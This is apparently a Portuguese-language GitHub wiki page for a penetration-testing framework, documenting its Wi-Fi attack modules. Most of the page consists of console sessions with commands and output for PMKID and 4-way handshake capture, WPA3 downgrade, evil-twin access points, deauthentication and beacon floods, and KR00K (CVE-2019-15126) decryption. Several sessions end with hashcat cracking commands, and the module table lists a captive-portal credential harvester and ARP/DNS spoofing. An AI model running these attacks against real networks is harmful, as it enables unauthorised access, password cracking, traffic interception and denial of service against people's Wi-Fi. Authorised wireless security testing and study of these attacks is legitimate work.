-
Notifications
You must be signed in to change notification settings - Fork 2
Ataques WiFi
André Henrique edited this page Jun 8, 2026
·
1 revision
Idioma: Português (pt-BR) | English: Wi-Fi-Attacks
Referência completa para módulos de ataque WPA2, WPA3, WPE/EAPOL e 802.11.
| Módulo | Descrição |
|---|---|
wifi_lab/fragattacks |
FragAttacks (CVE-2020-26140+) - veja FragAttacks |
wifi_lab/handshake_snooper |
Pipeline de captura handshake PMKID-first + deauth |
wifi_lab/wpa3_attack_suite |
Dragonblood SAE flood, CSA+harvest, Double SSID, downgrade |
wifi_lab/auth_flood |
Flood de Auth/EAPOL, modo amok, mesh flood (backend mdk4) |
wifi_lab/beacon_flood |
Spam de beacon com SSIDs personalizados |
wifi_lab/evil_twin_workflow |
Evil twin completo com verificação pós-captura |
wifi_lab/captive_portal_modern_lab |
Portal cativo moderno com coletor de credenciais HTML/JS |
wifi_lab/mitm_wifi_bridge |
Spoofing ARP/DNS + combo Ghost (bettercap) |
wifi_lab/adaptive_harvest |
Coleta adaptativa de canal/PMKID orientada por pontuação |
wifi_lab/wardriving_deauth_loop |
Ciclos automatizados de scan/deauth/captura durante wardriving |
wifi_lab/wireless_ids |
IDS leve: baseline BSSID + detecção de AP desonesto |
wifi_lab/awdl_attack |
AWDL/AirDrop (opendrop + owl) - descoberta, envio, DoS |
wifi_lab/momo_integrated_attack |
Orquestração KARMA + PMKID-first + downgrade |
wifi_lab/research_ecosystem_status |
Status de todas as integrações de submódulos de pesquisa |
wifi_lab/gps_wardriving_ndjson |
GPS NMEA -> log de wardriving NDJSON |
wifi_lab/wifi_sniffer |
Sniffer multi-backend (tcpdump/scapy/tshark) |
wifi_lab/wifi_kr00k_cve_2019_15126 |
CVE-2019-15126 KR00K: deauth + decriptação CCMP com TK zerado |
wxf > use generic/wifi_lab/handshake_snooper
wxf (HandshakeSnooper) > set INTERFACE wlan0mon
wxf (HandshakeSnooper) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (HandshakeSnooper) > run
[*] Starting handshake capture on wlan0mon
[*] Target: AA:BB:CC:DD:EE:FF (HomeWifi) ch6 WPA2-PSK
[*] Attempting PMKID capture (clientless)...
[+] PMKID captured: 4d4f4e4f3a3a3aaabbccddeeff...
[*] Saving to /tmp/capture_AABBCCDDEEFF.pcap
[+] Capture complete. Crack with: hashcat -m 22000 capture.hc22000 rockyou.txt
Sem PMKID, recorre à captura 4-way via deauth:
[*] PMKID not available - attempting deauth + EAPOL capture
[*] Sending 5 deauth frames to force client reconnect...
[*] Monitoring for EAPOL 4-way handshake...
[+] Handshake captured (4-way EAPOL, all 4 messages)
[+] CCMP/TKIP: check with aircrack-ng or hashcat -m 22000
O WPA3 utiliza SAE (Simultaneous Authentication of Equals, também chamado de Dragonfly) em vez de PSK. As vulnerabilidades Dragonblood permitem ataques de downgrade e canal lateral contra implementações WPA3.
wxf > use generic/wifi_lab/wpa3_attack_suite
wxf (WPA3AttackSuite) > show options
Options:
INTERFACE wlan0mon Monitor mode interface
TARGET_BSSID (required) Target AP BSSID
ATTACK_TYPE all Attack vector (sae_flood, downgrade, double_ssid, csa_harvest)
SIMULATE true Dry-run
wxf (WPA3AttackSuite) > set INTERFACE wlan0mon
wxf (WPA3AttackSuite) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (WPA3AttackSuite) > set ATTACK_TYPE downgrade
wxf (WPA3AttackSuite) > set SIMULATE true
wxf (WPA3AttackSuite) > run
[SIMULATE] WPA3 Downgrade Attack (CVE-2019-13377)
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Creating rogue AP: same SSID (HomeWifi), WPA2-only capability advertisement
[SIMULATE] Sending Channel Switch Announcement (CSA) to move clients to rogue AP
[SIMULATE] Once clients associate to rogue AP, capture WPA2 handshake for cracking
[!] Set SIMULATE=false to run
[!] Requires: wlan0 (managed) + wlan0mon (monitor) + hostapd/dnsmasq
wxf > use generic/wifi_lab/evil_twin_workflow
wxf (EvilTwin) > set INTERFACE wlan0mon
wxf (EvilTwin) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (EvilTwin) > set TARGET_ESSID HomeWifi
wxf (EvilTwin) > set CHANNEL 6
wxf (EvilTwin) > set SIMULATE true
wxf (EvilTwin) > run
[SIMULATE] Evil Twin Workflow
[SIMULATE] Phase 1: Deauth all clients from AA:BB:CC:DD:EE:FF (HomeWifi) ch6
[SIMULATE] Phase 2: Start rogue AP: SSID=HomeWifi, channel=6, OPEN (captive)
[SIMULATE] Phase 3: DHCP + DNS server on rogue AP
[SIMULATE] Phase 4: Monitor for client associations
[SIMULATE] Phase 5: Capture WPA2 handshake when client retries real AP
[SIMULATE] - Verify captured handshake against captured clients
[SIMULATE] - Export for aircrack-ng / hashcat
[!] Set SIMULATE=false
[!] PREREQ: hostapd + dnsmasq installed
wxf > use generic/wifi_lab/auth_flood
wxf (AuthFlood) > set INTERFACE wlan0mon
wxf (AuthFlood) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (AuthFlood) > set MODE deauth
wxf (AuthFlood) > set SIMULATE true
wxf (AuthFlood) > run
[SIMULATE] Deauth flood against AA:BB:CC:DD:EE:FF
[SIMULATE] Frames: 100/s, broadcast client (FF:FF:FF:FF:FF:FF), reason 0x07
[!] Set SIMULATE=false to run
[!] PREREQ: wlan0mon in monitor mode on same channel as target
wxf > use generic/wifi_lab/beacon_flood
wxf (BeaconFlood) > set INTERFACE wlan0mon
wxf (BeaconFlood) > set SSID_COUNT 500
wxf (BeaconFlood) > set CHANNEL 6
wxf (BeaconFlood) > set SIMULATE true
wxf (BeaconFlood) > run
[SIMULATE] Beacon flood: 500 unique SSIDs on channel 6
[SIMULATE] Rotates SSIDs and MACs to avoid deduplication
[SIMULATE] Approx rate: 50 beacons/s
[!] Set SIMULATE=false (uses mdk4 backend)
[!] PREREQ: mdk4 installed
O KR00K afeta chips 802.11 da Broadcom e Cypress. Após uma desautenticação, o chip transmite frames de dados armazenados em buffer criptografados com uma TK (Temporal Key) zerada, permitindo a decriptação desses frames sem a senha WPA2.
wxf > use generic/wifi_lab/wifi_kr00k_cve_2019_15126
wxf (KR00K) > show info
Name: KR00K Unauthenticated CCMP Decryption
CVE: CVE-2019-15126
CVSS: 6.5 (Medium)
Target: Devices with Broadcom BCM4375, BCM4389 or Cypress CYW43xx chips
(includes many iPhones, MacBooks, Kindles, Raspberry Pi, many routers)
Auth: None required (attacker just needs to be in WiFi range)
Description:
After receiving a deauth frame, the affected chip clears the TK to all zeros
but continues to transmit buffered frames using the zeroed key.
These frames can be trivially decrypted by an observer.
Exposes partial network traffic including DNS queries, HTTP requests, etc.
wxf (KR00K) > set INTERFACE wlan0mon
wxf (KR00K) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KR00K) > set TARGET_STA 11:22:33:44:55:66
wxf (KR00K) > set SIMULATE true
wxf (KR00K) > run
[SIMULATE] CVE-2019-15126 KR00K
[SIMULATE] Step 1: Send deauth to 11:22:33:44:55:66 from AA:BB:CC:DD:EE:FF
[SIMULATE] Step 2: Capture frames transmitted immediately after deauth
[SIMULATE] Expected: buffered frames encrypted with TK=00:00:00:00:...
[SIMULATE] Step 3: Decrypt captured frames with all-zeros CCMP key
[SIMULATE] Potential exposure: last 5-15 seconds of buffered traffic
[!] Set SIMULATE=false to run
[!] PREREQ: wlan0mon on target channel
[!] NOTE: Affects many common devices from 2016-2019, patched in 2020
wxf > use generic/pcap/pcap_handshake_extractor
wxf (PCAPHandshakeExtractor) > set PCAP_FILE /captures/office.pcap
wxf (PCAPHandshakeExtractor) > run
[*] Analyzing /captures/office.pcap...
[+] Handshake found: AA:BB:CC:DD:EE:FF (HomeWifi) - 4-way EAPOL complete
[+] Handshake found: 11:22:33:44:55:66 (GuestNet) - partial (msg1,2 only)
[+] PMKID found: FF:EE:DD:CC:BB:AA (OfficeWifi)
[*] Exported: /captures/office_handshakes.hc22000
[*] Crack: hashcat -m 22000 /captures/office_handshakes.hc22000 rockyou.txt
Páginas relacionadas: FragAttacks | KRACK | Bluetooth e BLE
Autor: André Henrique (@mrhenrike) | União Geek
Primeiros Passos
Ataques Wireless
Drones e UAV
Protocolos Especializados
Ferramentas de Pentest
Hardware